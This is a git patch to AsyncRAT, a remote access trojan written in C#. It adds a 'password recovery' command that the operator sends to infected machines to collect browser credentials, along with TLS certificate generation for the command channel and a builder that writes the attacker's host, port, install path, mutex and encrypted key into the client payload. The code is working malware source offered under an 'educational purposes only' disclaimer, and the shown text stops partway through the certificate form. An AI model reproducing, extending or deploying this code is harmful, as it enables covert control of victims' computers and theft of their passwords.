From db90ddf043620c916cfc4348f17cae2cf757b225 Mon Sep 17 00:00:00 2001 From: NYAN CAT Date: Sat, 11 May 2019 08:05:18 -0700 Subject: [PATCH] Update Added secure socket Added chrome password recovery --- AsyncRAT-C#/AsyncRAT-Sharp/App.config | 11 +- .../AsyncRAT-Sharp/AsyncRAT-Sharp.csproj | 16 + .../AsyncRAT-Sharp/Cryptography/Sha256.cs | 33 + .../AsyncRAT-Sharp/Forms/Form1.Designer.cs | 17 +- AsyncRAT-C#/AsyncRAT-Sharp/Forms/Form1.cs | 42 +- .../AsyncRAT-Sharp/Forms/FormBuilder.cs | 38 +- .../Forms/FormCertificate.Designer.cs | 66 ++ .../AsyncRAT-Sharp/Forms/FormCertificate.cs | 127 ++++ .../AsyncRAT-Sharp/Forms/FormCertificate.resx | 577 ++++++++++++++++++ .../AsyncRAT-Sharp/Forms/FormDownloadFile.cs | 10 +- .../Forms/FormPorts.Designer.cs | 28 +- AsyncRAT-C#/AsyncRAT-Sharp/Forms/FormPorts.cs | 23 +- .../Handle Packet/HandleFileManager.cs | 1 + .../Handle Packet/HandleRemoteDesktop.cs | 1 + .../AsyncRAT-Sharp/Handle Packet/Packet.cs | 15 +- AsyncRAT-C#/AsyncRAT-Sharp/Helper/Methods.cs | 16 +- AsyncRAT-C#/AsyncRAT-Sharp/Program.cs | 12 + .../Properties/Resources.Designer.cs | 10 + .../AsyncRAT-Sharp/Properties/Resources.resx | 7 +- .../Properties/Settings.Designer.cs | 12 - .../Properties/Settings.settings | 3 - .../Resources/AsyncRAT-Sharp.exe.config | 11 +- AsyncRAT-C#/AsyncRAT-Sharp/Resources/key.png | Bin 0 -> 828 bytes AsyncRAT-C#/AsyncRAT-Sharp/Settings.cs | 11 +- AsyncRAT-C#/AsyncRAT-Sharp/Socket/Clients.cs | 119 ++-- AsyncRAT-C#/AsyncRAT-Sharp/packages.config | 1 + AsyncRAT-C#/Client/Client.csproj | 5 + AsyncRAT-C#/Client/Cryptography/Sha256.cs | 33 + AsyncRAT-C#/Client/Handle Packet/HandleDos.cs | 13 +- .../Client/Handle Packet/HandleFileManager.cs | 28 +- .../Handle Packet/HandleRemoteDesktop.cs | 21 +- AsyncRAT-C#/Client/Handle Packet/Packet.cs | 9 +- AsyncRAT-C#/Client/Program.cs | 4 + AsyncRAT-C#/Client/Recovery/Recovery.cs | 219 +++++++ AsyncRAT-C#/Client/Recovery/SQLiteHandler.cs | 473 ++++++++++++++ AsyncRAT-C#/Client/Settings.cs | 46 +- AsyncRAT-C#/Client/Sockets/ClientSocket.cs | 99 +-- 37 files changed, 1940 insertions(+), 217 deletions(-) create mode 100644 AsyncRAT-C#/AsyncRAT-Sharp/Cryptography/Sha256.cs create mode 100644 AsyncRAT-C#/AsyncRAT-Sharp/Forms/FormCertificate.Designer.cs create mode 100644 AsyncRAT-C#/AsyncRAT-Sharp/Forms/FormCertificate.cs create mode 100644 AsyncRAT-C#/AsyncRAT-Sharp/Forms/FormCertificate.resx create mode 100644 AsyncRAT-C#/AsyncRAT-Sharp/Resources/key.png create mode 100644 AsyncRAT-C#/Client/Cryptography/Sha256.cs create mode 100644 AsyncRAT-C#/Client/Recovery/Recovery.cs create mode 100644 AsyncRAT-C#/Client/Recovery/SQLiteHandler.cs diff --git a/AsyncRAT-C#/AsyncRAT-Sharp/App.config b/AsyncRAT-C#/AsyncRAT-Sharp/App.config index 61bc085..67f88a7 100644 --- a/AsyncRAT-C#/AsyncRAT-Sharp/App.config +++ b/AsyncRAT-C#/AsyncRAT-Sharp/App.config @@ -11,22 +11,19 @@ - - - - + - + - + False - + diff --git a/AsyncRAT-C#/AsyncRAT-Sharp/AsyncRAT-Sharp.csproj b/AsyncRAT-C#/AsyncRAT-Sharp/AsyncRAT-Sharp.csproj index c5c450b..2b7c3e9 100644 --- a/AsyncRAT-C#/AsyncRAT-Sharp/AsyncRAT-Sharp.csproj +++ b/AsyncRAT-C#/AsyncRAT-Sharp/AsyncRAT-Sharp.csproj @@ -43,6 +43,9 @@ app.manifest + + ..\packages\BouncyCastle.1.8.5\lib\BouncyCastle.Crypto.dll + False Resources\cGeoIp.dll @@ -53,6 +56,8 @@ + + @@ -65,6 +70,7 @@ + Form @@ -77,6 +83,12 @@ FormBuilder.cs + + Form + + + FormCertificate.cs + Form @@ -170,6 +182,9 @@ FormBuilder.cs + + FormCertificate.cs + FormDOS.cs @@ -219,6 +234,7 @@ + diff --git a/AsyncRAT-C#/AsyncRAT-Sharp/Cryptography/Sha256.cs b/AsyncRAT-C#/AsyncRAT-Sharp/Cryptography/Sha256.cs new file mode 100644 index 0000000..55e815c --- /dev/null +++ b/AsyncRAT-C#/AsyncRAT-Sharp/Cryptography/Sha256.cs @@ -0,0 +1,33 @@ +using System.Security.Cryptography; +using System.Text; + +namespace AsyncRAT_Sharp.Cryptography +{ + public static class Sha256 + { + public static string ComputeHash(string input) + { + byte[] data = Encoding.UTF8.GetBytes(input); + + using (SHA256Managed sha = new SHA256Managed()) + { + data = sha.ComputeHash(data); + } + + StringBuilder hash = new StringBuilder(); + + foreach (byte _byte in data) + hash.Append(_byte.ToString("X2")); + + return hash.ToString().ToUpper(); + } + + public static byte[] ComputeHash(byte[] input) + { + using (SHA256Managed sha = new SHA256Managed()) + { + return sha.ComputeHash(input); + } + } + } +} diff --git a/AsyncRAT-C#/AsyncRAT-Sharp/Forms/Form1.Designer.cs b/AsyncRAT-C#/AsyncRAT-Sharp/Forms/Form1.Designer.cs index 23762ae..c771e2d 100644 --- a/AsyncRAT-C#/AsyncRAT-Sharp/Forms/Form1.Designer.cs +++ b/AsyncRAT-C#/AsyncRAT-Sharp/Forms/Form1.Designer.cs @@ -64,6 +64,7 @@ this.bUILDERToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem(); this.toolStripSeparator3 = new System.Windows.Forms.ToolStripSeparator(); this.aBOUTToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem(); + this.pASSWORDRECOVERYToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem(); this.statusStrip1 = new System.Windows.Forms.StatusStrip(); this.toolStripStatusLabel1 = new System.Windows.Forms.ToolStripStatusLabel(); this.ping = new System.Windows.Forms.Timer(this.components); @@ -157,12 +158,12 @@ // lv_prefor // this.lv_prefor.Text = "PERFORMANCE"; - this.lv_prefor.Width = 170; + this.lv_prefor.Width = 189; // // lv_admin // this.lv_admin.Text = "PRIVILEGES"; - this.lv_admin.Width = 138; + this.lv_admin.Width = 166; // // contextMenuStrip1 // @@ -178,6 +179,7 @@ this.kEYLOGGERToolStripMenuItem, this.toolStripMenuItem1, this.fILEMANAGERToolStripMenuItem, + this.pASSWORDRECOVERYToolStripMenuItem, this.pROCESSMANAGERToolStripMenuItem, this.dISABLESToolStripMenuItem, this.bOTKILLERToolStripMenuItem, @@ -188,7 +190,7 @@ this.toolStripSeparator3, this.aBOUTToolStripMenuItem}); this.contextMenuStrip1.Name = "contextMenuStrip1"; - this.contextMenuStrip1.Size = new System.Drawing.Size(283, 502); + this.contextMenuStrip1.Size = new System.Drawing.Size(283, 568); // // cLIENTOPTIONSToolStripMenuItem // @@ -373,6 +375,14 @@ this.aBOUTToolStripMenuItem.Text = "ABOUT"; this.aBOUTToolStripMenuItem.Click += new System.EventHandler(this.ABOUTToolStripMenuItem_Click); // + // pASSWORDRECOVERYToolStripMenuItem + // + this.pASSWORDRECOVERYToolStripMenuItem.Image = global::AsyncRAT_Sharp.Properties.Resources.key; + this.pASSWORDRECOVERYToolStripMenuItem.Name = "pASSWORDRECOVERYToolStripMenuItem"; + this.pASSWORDRECOVERYToolStripMenuItem.Size = new System.Drawing.Size(282, 30); + this.pASSWORDRECOVERYToolStripMenuItem.Text = "PASSWORD RECOVERY"; + this.pASSWORDRECOVERYToolStripMenuItem.Click += new System.EventHandler(this.PASSWORDRECOVERYToolStripMenuItem_Click); + // // statusStrip1 // this.statusStrip1.ImageScalingSize = new System.Drawing.Size(24, 24); @@ -638,6 +648,7 @@ private System.Windows.Forms.ToolStripMenuItem wINDOWDSDEFENDERToolStripMenuItem; private System.Windows.Forms.ToolStripMenuItem gETADMINISTRATORPRIVILEGESToolStripMenuItem; private System.Windows.Forms.ColumnHeader lv_admin; + private System.Windows.Forms.ToolStripMenuItem pASSWORDRECOVERYToolStripMenuItem; } } diff --git a/AsyncRAT-C#/AsyncRAT-Sharp/Forms/Form1.cs b/AsyncRAT-C#/AsyncRAT-Sharp/Forms/Form1.cs index 3fa3288..726c66f 100644 --- a/AsyncRAT-C#/AsyncRAT-Sharp/Forms/Form1.cs +++ b/AsyncRAT-C#/AsyncRAT-Sharp/Forms/Form1.cs @@ -13,14 +13,21 @@ using AsyncRAT_Sharp.Cryptography; using System.Diagnostics; using System.Net.Sockets; using AsyncRAT_Sharp.Handle_Packet; +using AsyncRAT_Sharp.Helper; +using System.Security.Cryptography.X509Certificates; // │ Author : NYAN CAT -// │ Name : AsyncRAT // Simple Socket +// │ Name : AsyncRAT // Simple RAT // Contact Me : https://github.com/NYAN-x-CAT // This program Is distributed for educational purposes only. +// Credits; +// Serialization @ymofen +// StreamLibrary @Dergan +// Special Thanks MaxXor@hf gigajew@hf + namespace AsyncRAT_Sharp { @@ -28,7 +35,6 @@ namespace AsyncRAT_Sharp { public Form1() { - CheckFiles(); InitializeComponent(); this.Opacity = 0; } @@ -64,19 +70,17 @@ namespace AsyncRAT_Sharp private async void Form1_Load(object sender, EventArgs e) { - Text = $"{Settings.Version}"; + CheckFiles(); + + this.Text = $"{Settings.Version}"; #if DEBUG + Settings.ServerCertificate = new X509Certificate2(Convert.FromBase64String("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")); Settings.Port = "6606"; - Settings.Password = "NYAN CAT"; - Settings.AES = new Aes256(Settings.Password); #else using (FormPorts portsFrm = new FormPorts()) { portsFrm.ShowDialog(); Settings.Port = portsFrm.textPorts.Text; - Settings.Password = portsFrm.textPassword.Text; - Settings.AES = new Aes256(Settings.Password); - new HandleLogs().Addmsg($"Password {Settings.Password}", Color.Green); } #endif @@ -711,5 +715,27 @@ namespace AsyncRAT_Sharp } } } + + private void PASSWORDRECOVERYToolStripMenuItem_Click(object sender, EventArgs e) + { + if (listView1.SelectedItems.Count > 0) + { + try + { + MsgPack msgpack = new MsgPack(); + msgpack.ForcePathObject("Packet").AsString = "recoveryPassword"; + foreach (ListViewItem itm in listView1.SelectedItems) + { + Clients client = (Clients)itm.Tag; + ThreadPool.QueueUserWorkItem(client.BeginSend, msgpack.Encode2Bytes()); + } + } + catch (Exception ex) + { + MessageBox.Show(ex.Message); + return; + } + } + } } } \ No newline at end of file diff --git a/AsyncRAT-C#/AsyncRAT-Sharp/Forms/FormBuilder.cs b/AsyncRAT-C#/AsyncRAT-Sharp/Forms/FormBuilder.cs index 59ee64a..d71dceb 100644 --- a/AsyncRAT-C#/AsyncRAT-Sharp/Forms/FormBuilder.cs +++ b/AsyncRAT-C#/AsyncRAT-Sharp/Forms/FormBuilder.cs @@ -4,6 +4,9 @@ using Mono.Cecil; using AsyncRAT_Sharp.Helper; using Mono.Cecil.Cil; using System.Text; +using System.Security.Cryptography; +using AsyncRAT_Sharp.Cryptography; +using System.Security.Cryptography.X509Certificates; namespace AsyncRAT_Sharp.Forms { @@ -92,6 +95,17 @@ namespace AsyncRAT_Sharp.Forms private void WriteSettings(AssemblyDefinition asmDef) { + var key = Methods.GetRandomString(32); + var aes = new Aes256(key); + var caCertificate = new X509Certificate2(Settings.CertificatePath, "", X509KeyStorageFlags.Exportable); + var serverCertificate = new X509Certificate2(caCertificate.Export(X509ContentType.Cert)); + byte[] signature; + using (var csp = (RSACryptoServiceProvider)caCertificate.PrivateKey) + { + var hash = Sha256.ComputeHash(Encoding.UTF8.GetBytes(key)); + signature = csp.SignHash(hash, CryptoConfig.MapNameToOID("SHA256")); + } + foreach (var typeDef in asmDef.Modules[0].Types) { if (typeDef.FullName == "Client.Settings") @@ -106,29 +120,35 @@ namespace AsyncRAT_Sharp.Forms { string operand = methodDef.Body.Instructions[i].Operand.ToString(); - if (operand == "6606") - methodDef.Body.Instructions[i].Operand = Settings.AES.Encrypt(textPort.Text); + if (operand == "%Ports%") + methodDef.Body.Instructions[i].Operand = aes.Encrypt(textPort.Text); - if (operand == "127.0.0.1") - methodDef.Body.Instructions[i].Operand = Settings.AES.Encrypt(textIP.Text); + if (operand == "%Hosts%") + methodDef.Body.Instructions[i].Operand = aes.Encrypt(textIP.Text); - if (operand == "false") + if (operand == "%Install%") methodDef.Body.Instructions[i].Operand = checkBox1.Checked.ToString().ToLower(); - if (operand == "%AppData%") + if (operand == "%Folder%") methodDef.Body.Instructions[i].Operand = comboBoxFolder.Text; - if (operand == "Payload.exe") + if (operand == "%File%") methodDef.Body.Instructions[i].Operand = textFilename.Text; - if (operand == "NYAN CAT") - methodDef.Body.Instructions[i].Operand = Convert.ToBase64String(Encoding.UTF8.GetBytes(Settings.Password)); + if (operand == "%Key%") + methodDef.Body.Instructions[i].Operand = Convert.ToBase64String(Encoding.UTF8.GetBytes(key)); if (operand == "%MTX%") methodDef.Body.Instructions[i].Operand = txtMutex.Text; if (operand == "%Anti%") methodDef.Body.Instructions[i].Operand = chkAnti.Checked.ToString().ToLower(); + + if (operand == "%Certificate%") + methodDef.Body.Instructions[i].Operand = aes.Encrypt(Convert.ToBase64String(serverCertificate.Export(X509ContentType.Cert))); + + if (operand == "%Serversignature%") + methodDef.Body.Instructions[i].Operand = aes.Encrypt(Convert.ToBase64String(signature)); } } } diff --git a/AsyncRAT-C#/AsyncRAT-Sharp/Forms/FormCertificate.Designer.cs b/AsyncRAT-C#/AsyncRAT-Sharp/Forms/FormCertificate.Designer.cs new file mode 100644 index 0000000..9c2ba39 --- /dev/null +++ b/AsyncRAT-C#/AsyncRAT-Sharp/Forms/FormCertificate.Designer.cs @@ -0,0 +1,66 @@ +namespace AsyncRAT_Sharp.Forms +{ + partial class FormCertificate + { + /// + /// Required designer variable. + /// + private System.ComponentModel.IContainer components = null; + + /// + /// Clean up any resources being used. + /// + /// true if managed resources should be disposed; otherwise, false. + protected override void Dispose(bool disposing) + { + if (disposing && (components != null)) + { + components.Dispose(); + } + base.Dispose(disposing); + } + + #region Windows Form Designer generated code + + /// + /// Required method for Designer support - do not modify + /// the contents of this method with the code editor. + /// + private void InitializeComponent() + { + System.ComponentModel.ComponentResourceManager resources = new System.ComponentModel.ComponentResourceManager(typeof(FormCertificate)); + this.richTextBox1 = new System.Windows.Forms.RichTextBox(); + this.SuspendLayout(); + // + // richTextBox1 + // + this.richTextBox1.BorderStyle = System.Windows.Forms.BorderStyle.None; + this.richTextBox1.Dock = System.Windows.Forms.DockStyle.Fill; + this.richTextBox1.Font = new System.Drawing.Font("Microsoft Sans Serif", 10F, System.Drawing.FontStyle.Regular, System.Drawing.GraphicsUnit.Point, ((byte)(0))); + this.richTextBox1.Location = new System.Drawing.Point(0, 0); + this.richTextBox1.Name = "richTextBox1"; + this.richTextBox1.ReadOnly = true; + this.richTextBox1.Size = new System.Drawing.Size(565, 146); + this.richTextBox1.TabIndex = 0; + this.richTextBox1.Text = " \n Certificate is not found.\n Creating a new certificate... Please wait..."; + // + // FormCertificate + // + this.AutoScaleDimensions = new System.Drawing.SizeF(9F, 20F); + this.AutoScaleMode = System.Windows.Forms.AutoScaleMode.Font; + this.ClientSize = new System.Drawing.Size(565, 146); + this.Controls.Add(this.richTextBox1); + this.Icon = ((System.Drawing.Icon)(resources.GetObject("$this.Icon"))); + this.Name = "FormCertificate"; + this.StartPosition = System.Windows.Forms.FormStartPosition.CenterParent; + this.Text = "Certificate"; + this.Load += new System.EventHandler(this.FormCertificate_Load); + this.ResumeLayout(false); + + } + + #endregion + + private System.Windows.Forms.RichTextBox richTextBox1; + } +} \ No newline at end of file diff --git a/AsyncRAT-C#/AsyncRAT-Sharp/Forms/FormCertificate.cs b/AsyncRAT-C#/AsyncRAT-Sharp/Forms/FormCertificate.cs new file mode 100644 index 0000000..dd4c167 --- /dev/null +++ b/AsyncRAT-C#/AsyncRAT-Sharp/Forms/FormCertificate.cs @@ -0,0 +1,127 @@ +using System; +using System.Threading.Tasks; +using System.Windows.Forms; +using Org.BouncyCastle.Asn1.X509; +using Org.BouncyCastle.Crypto; +using Org.BouncyCastle.Crypto.Generators; +using Org.BouncyCastle.Crypto.Operators; +using Org.BouncyCastle.Crypto.Parameters; +using Org.BouncyCastle.Crypto.Prng; +using Org.BouncyCastle.Math; +using Org.BouncyCastle.Security; +using Org.BouncyCastle.X509; +using Org.BouncyCastle.X509.Extension; +using System.Security.Cryptography.X509Certificates; +using System.IO; +using System.IO.Compression; + +namespace AsyncRAT_Sharp.Forms +{ + public partial class FormCertificate : Form + { + public FormCertificate() + { + InitializeComponent(); + } + + private async void FormCertificate_Load(object sender, EventArgs e) + { + await Task.Run(() => + { + try + { + string backup = Application.StartupPath + "\\BackupCertificate.zip"; + if (File.Exists(backup)) + { + MessageBox.Show(this, "Found a zip backup, Extracting (BackupCertificate.zip)", "Certificate backup", MessageBoxButtons.OK, MessageBoxIcon.Information); + ZipFile.ExtractToDirectory(backup, Application.StartupPath); + Settings.ServerCertificate = new X509Certificate2(Settings.CertificatePath); + return; + } + + Settings.ServerCertificate = CreateCertificateAuthority("AsyncRAT Server CA", 4096); + File.WriteAllBytes(Settings.CertificatePath, Settings.ServerCertificate.Export(X509ContentType.Pkcs12)); + + using (ZipArchive archive = ZipFile.Open(backup, ZipArchiveMode.Create)) + { + archive.CreateEntryFromFile(Settings.CertificatePath, Path.GetFileName(Settings.CertificatePath)); + } + MessageBox.Show(this, "Created a ZIP backup (BackupCertificate.zip)", "Certificate backup", MessageBoxButtons.OK, MessageBoxIcon.Information); + } + catch (Exception ex) + { + MessageBox.Show(this, ex.Message, "Certificate", MessageBoxButtons.OK, MessageBoxIcon.Exclamation); + Environment.Exit(0); + } + }); + this.Close(); + } + + public static X509Certificate2 CreateCertificate(string certName, X509Certificate2 ca, int keyStrength) + { + var caCert = DotNetUtilities.FromX509Certificate(ca); + var random = new SecureRandom(new CryptoApiRandomGenerator()); + var keyPairGen = new RsaKeyPairGenerator(); + keyPairGen.Init(new KeyGenerationParameters(random, keyStrength)); + AsymmetricCipherKeyPair keyPair = keyPairGen.GenerateKeyPair(); + + var certificateGenerator = new X509V3CertificateGenerator(); + + var CN = new X509Name("CN=" + certName); + var SN = BigInteger.ProbablePrime(120, random); + + certificateGenerator.SetSerialNumber(SN); + certificateGenerator.SetSubjectDN(CN); + certificateGenerator.SetIssuerDN(caCert.IssuerDN); + certificateGenerator.SetNotAfter(DateTime.MaxValue); + certificateGenerator.SetNotBefore(DateTime.UtcNow.Subtract(new TimeSpan(1, 0, 0, 0))); + certificateGenerator.SetPublicKey(keyPair.Public); + certificateGenerator.AddExtension(X509Extensions.SubjectKeyIdentifier, false, new SubjectKeyIdentifierStructure(keyPair.Public)); + certificateGenerator.AddExtension(X509Extensions.AuthorityKeyIdentifier, false, new AuthorityKeyIdentifierStructure(caCert.GetPublicKey())); + + var caKeyPair = 